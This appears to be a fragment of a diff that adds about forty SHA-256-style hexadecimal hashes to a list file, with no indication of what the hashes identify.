+7a599ff4a58cb0672a1b5e912a57fcdc4b0e2445ec9bc653f7f3e7a7d1dc627f +7b88fa41d6a03aeda120627d3363b739a30fe00008ce8d848c2cbb5b4473d8bc +7e0b340815351dab035b28b16ca66a2c1c7eaf22edf9ead73d2276fe7d92bab4 +8285ee3115e8c71c24ca3bdce313d3cfadead283c31a116180d4c2611efb610d +864c261555fce40d022a68d0b0eadb7ab69da6af52af081fd1d9e3eced4aee46 +870d6c202fcc72088ff5d8e71cc0990777a7621851df10ba74d0e07d19174887 +8b036e5e96ab980df3dca44390d6f447d4ca662a7eddac9f52d172efff4c58f8 +8b18c1336770fcddc6fe78d9220386bce565f98cc8ada5a90ce69ce3ddf36043 +8bb7842991afe86b97def19f226cb7e0a9f9527a75981f5e24a70444a7299809 +8ec87dee13de3281d55f7d1d3b48115a0f5e4a41bfbef1ea08e496ac529829c8 +958bce41371b68706feae0f929a18fa84d4a8a199262c2110a7c1c12d2b1dce2 +9d2e25ec0208a55fba97ac70b23d3d3753e9b906b4546d1b14d8c92f8d8eb03d +a93b9333a203e7eed197d0603e78413013bd5d8132109bbef5ef93b36b83957c +af9a19f99e0dcd82a31e0c8fc68e89d104ef2039b7288a203f6d2e4f63ae4d5c +b0d69e260a44054999baa348748cf4b2d1eaab3dd3385bb6ad5931ff47a920de +b22f55e476209adb43929077be83481ebda7e804d117d77266b186665e4b1845 +b4d0f0d652f907e4e77a9453dcce7810b75e1dc5867deb69bea1e4ecdd02d877 +bcc3d47940ae280c63b229d21c50d25128b2a15ea42fe8572026f88f32ed0628 +bd07a4ccc8fa67e2e80b9c308dec140ca1ae9c027fa03f2828e4b5bdba6c7391 +bf09a1a7896e05b18c033d2d62f70ea4cac85e2d72dbd8869e12b61571c0327e +c32e559568d2f6960bc41ca0560ac8f459947e170339811804011802d2f87d69 +c6d735b7a4656a52f3cd1d24265e4f2a91652f1a775877129b322114c9547deb +ca2ee3f30e1c997cc9d8e8f13ec94134cdb378c4eb03232f5ed1df74c0a0a1f0 +cf525918cb648c81543d9603ac75bc63332627d0ec070c355a86e3595986cbb3 +d129481955f24430247d6cc4af975e4571b5af7c16e36814371575be07e72299 +d3e2e002574fb810ac5e456f122c30f232c5899534019d28e0e6822e426ed9d3 +d690d471b513c5d40caef9f1e37c94db20e6492b34ea6a3cddcc22058f842cf3 +da641f86f81f6333f2730795de93ad2a25ab279a527b8b9e9122b934a730ab08 +df90558a84cfcf80639f32b31aec187b813df556e3c155a05af91dedfd2d7429 +e08e241d6823efedf81d141cc8fd5587e13df08aeda9e1793f754871521da226 +e1999a3e5a611312e16bb65bb5a880dfedbab8d4d2c0a5d3ed1ed926a3f63e94 +e3d64a128e9267640f8fc3e6ba5399f75f6f0aca6a8db48bf989fe67a7ee1a71 +f04dc3c62b305cdb4d83d8df2caa2d37feeb0a86fb5a745df416bac62a3b9731 +f1a592208723a66fa51ce1bc35cbd6864e24011c6dc3bcd056346428e4e1c55d +f4e3cfeeb4e10f61049a88527321af8c77d95349caf616e86d7ff4f5ba203e5f +fa0ea232ab160a652fcbd8d6db8ffa09fd64bcb3228f000434d6a8e340aaf4cb +fa94282e34901eba45720c4f89a0c820d32840ae49e53de8e75b2d6e78326074 +fca2ea3e471a0d612ce50abc8738085f076ad022f70f78c3f8c83d1b2ff7896b +fd92e34675e5b0b8bfbc6b1f3a00a7652e67a162f1ea612f6e86cca846df76c5 \ No newline at end of file